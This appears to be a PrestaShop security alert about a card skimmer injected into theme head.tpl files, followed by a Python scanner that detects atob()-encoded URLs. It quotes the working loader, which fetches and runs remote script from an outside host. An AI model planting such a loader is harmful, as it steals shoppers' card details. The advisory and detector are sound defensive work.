@SHT

Prestashop Security Alert 12-02-2026

Hello Brahim,
We have recently identified a security threat affecting some online stores within the PrestaShop ecosystem. A malicious script (“digital skimmer”) has been detected and may have led to the theft of customers’ payment information.
This malware operates by replacing the legitimate payment buttons on the checkout page with fraudulent ones. When a customer clicks on one of these fake buttons, they are redirected to a counterfeit payment form designed to capture their bank card details.
The skimmer is simply loaded through a <script> tag, written directly inside the file _partials/head.tpl of the active theme of the store. This means the attacker was able to modify a file on the store. Inside the script tag, the following code can be found:
<script>(function(){var x=new XMLHttpRequest;x.open('GET',atob('aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz'));x.onload=function(){if(200===x.status)try{Function(x.responseText)()}catch(e){}};x.send();})();</script>
The part aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz changes every time, but the structure of the code remains the same, and the atob() function is always used. Some code can be found before or after (the skimmer attempts to hide itself by being a little different on every shop).
At this stage, we strongly recommend that you perform a thorough security check of your PrestaShop stores and ensure none of them has been compromised. You can also check this page for further details on the situation.
Our technical teams are actively investigating the origin of this attack and are taking all necessary measures to prevent further impact. We thank you for your vigilance and cooperation.

🔎 What does this code do?

  • atob() decodes a Base64 string
  • This produces an external URL
  • Your site loads a hidden malicious script
  • This script:
    • Replaces the real payment buttons
    • Displays a fake bank card form
    • Steals customers' card numbers
⚠️ This is very serious if your store is affected.

❗ Why does this happen?

In 80% of cases:
  • A nulled / pirated module was installed
  • PrestaShop version not updated
  • Weak password
  • Access given to an unsecured freelancer
  • Infected computer
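
A defender-side check for the pattern the alert describes, as an added example that is not part of the alert or of PrestaShop's own tooling: it walks a themes directory, finds atob() literals in .tpl files and reports those that decode to a URL. The directory layout and the skimmer.example URL used in the demo are constructed placeholders.

```python
import base64
import re
import tempfile
from pathlib import Path

# atob('...') or atob("...") holding a Base64 literal, as in the alert's snippet
ATOB_RE = re.compile(r"""atob\(\s*['"]([A-Za-z0-9+/=]{8,})['"]\s*\)""")
URL_RE = re.compile(r"^(?:https?:)?//\S+$", re.I)

def decode_atob_urls(text):
    """Return the URLs hidden in atob() literals found in text."""
    urls = []
    for literal in ATOB_RE.findall(text):
        try:
            # atob() tolerates missing padding, so restore it before decoding
            padded = literal + "=" * (-len(literal) % 4)
            decoded = base64.b64decode(padded, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid Base64, or not text: ignore
        if URL_RE.match(decoded.strip()):
            urls.append(decoded.strip())
    return urls

def scan_themes(themes_dir):
    """Scan every .tpl under themes_dir; return {path: [decoded URLs]}."""
    findings = {}
    for tpl in sorted(Path(themes_dir).rglob("*.tpl")):
        urls = decode_atob_urls(tpl.read_text(encoding="utf-8", errors="replace"))
        if urls:
            findings[str(tpl)] = urls
    return findings

def demo():
    """Build a constructed theme tree with one clean and one tampered head.tpl."""
    # Constructed sample: the URL is a placeholder, not an indicator from the alert.
    b64 = base64.b64encode(b"https://skimmer.example/x.js").decode()
    loader = ("<script>(function(){var x=new XMLHttpRequest;"
              "x.open('GET',atob('%s'));x.send();})();</script>" % b64)
    with tempfile.TemporaryDirectory() as root:
        for theme, body in (("classic", "<title>{$page.title}</title>"),
                            ("custom", "<title>shop</title>\n" + loader)):
            d = Path(root, theme, "templates", "_partials")
            d.mkdir(parents=True)
            (d / "head.tpl").write_text(body, encoding="utf-8")
        return {Path(p).relative_to(root).as_posix(): u
                for p, u in scan_themes(root).items()}

if __name__ == "__main__":
    for path, urls in demo().items():
        print(path, "->", urls)
```

Call scan_themes() on the store's themes directory; a legitimate template can also call atob(), so each hit needs a manual look at the decoded URL.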


